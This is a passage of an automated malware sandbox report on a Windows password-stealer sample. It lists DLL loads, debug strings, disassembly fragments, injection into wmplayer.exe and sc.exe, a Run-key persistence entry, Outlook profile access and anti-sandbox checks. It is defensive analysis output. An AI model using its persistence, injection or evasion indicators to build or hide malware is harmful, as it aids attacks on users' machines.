            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: sppc.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: version.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: wmp.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: wmvcore.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: mfperfhelper.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: wmasf.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: wmploc.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: mmdevapi.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: devobj.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: mfplat.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: rtworkq.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: audioses.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: windows.ui.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: windowmanagementapi.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: textinputframework.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: inputhost.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: coreuicomponents.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: coreuicomponents.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: mlang.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: winmm.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: wmnetmgr.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: msxml3.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: msv1_0.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: ntlmshared.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: cryptdll.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: wdigest.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\unregmp2.exe | Section loaded: wmpps.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\sc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Static file information: File size 2928646 > 1048576
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF246C0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDBH source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: wmplayer.exe, 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2230114991.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2228408124.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.2321922412.000000000343E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2321954921.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2323720085.000000000338F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sc.pdbUGP source: wmplayer.exe, 00000006.00000002.2321810526.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944318113.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: wntdll.pdb source: wmplayer.exe, wmplayer.exe, 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2230114991.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2228408124.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.2321922412.000000000343E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 0000000D.00000003.2321954921.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2323720085.000000000338F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: sc.pdb source: wmplayer.exe, 00000006.00000002.2321810526.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944318113.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbCoe source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A0A3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: pC:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: mscorlib.pdb` source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp, WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0e source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF246C0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbx. source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3942485337.0000000000A7E000.00000002.00000001.01000000.00000009.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000000.2386545627.0000000000A7E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Drawing.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: mscorlib.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbPROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocaQ, source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.pdb- source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: wmplayer.pdbGCTL source: sc.exe, 0000000D.00000002.3946994371.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2615659691.00000000191BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: wmplayer.pdb source: sc.exe, 0000000D.00000002.3946994371.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2615659691.00000000191BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Code function: 0_2_00007FFD346858D4 push ds; ret 0_2_00007FFD346858D5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Code function: 0_2_00007FFD3468B86B push eax; retf 0_2_00007FFD3468B889
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Code function: 0_2_00007FFD34760003 push esp; retf 4810h 0_2_00007FFD34760312
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Code function: 0_2_00007FFD347606C9 pushad ; ret 0_2_00007FFD347606E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_0041C98B push 07E53DEBh; iretd 6_2_0041C990
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_004239A3 push edi; ret 6_2_004239AB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_0041A28D push cs; ret 6_2_0041A290
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_004082A0 pushfd ; ret 6_2_004082BC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_00403320 push eax; ret 6_2_00403322
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_00418BD3 push esi; ret 6_2_00418BD4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_00417E4C pushfd ; iretd 6_2_00417E4D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_00417F44 push eax; ret 6_2_00417F5D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_00401F8C push ebx; retf 6_2_00401F98
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_032D09AD push ecx; mov dword ptr [esp], ecx 6_2_032D09B6
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_035709AD push ecx; mov dword ptr [esp], ecx 13_2_035709B6
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E121FD push FFFFFFDCh; iretd 13_2_02E1222B
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E10140 push edi; retn EB3Ah 13_2_02E1016F
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E20680 push edi; ret 13_2_02E20688
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E19668 push 07E53DEBh; iretd 13_2_02E1966D
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E1E540 push cs; ret 13_2_02E1E608
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E14B29 pushfd ; iretd 13_2_02E14B2A
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E158B0 push esi; ret 13_2_02E158B1
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E1CF89 push esi; retf 13_2_02E1CF9B
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E1CF90 push esi; retf 13_2_02E1CF9B
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E16F6A push cs; ret 13_2_02E16F6D
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E04F7D pushfd ; ret 13_2_02E04F99
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E11CA0 push ebx; iretd 13_2_02E11CA1
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E14C21 push eax; ret 13_2_02E14C3A
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_033B9311 pushfd ; ret 13_2_033B9323
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_033B9215 push cs; ret 13_2_033B9216
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_033B37EE push B012FEBEh; iretd 13_2_033B37FB
            Source: C:\Windows\SysWOW64\sc.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PTR4CRBH
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"

            Hooking and other Techniques for Hiding and Protection

            Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (27).png
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\unregmp2.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\unregmp2.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe PID: 1512, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Memory allocated: 1DF0A230000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe Memory allocated: 1DF23BB0000 memory reserve | memory write watch
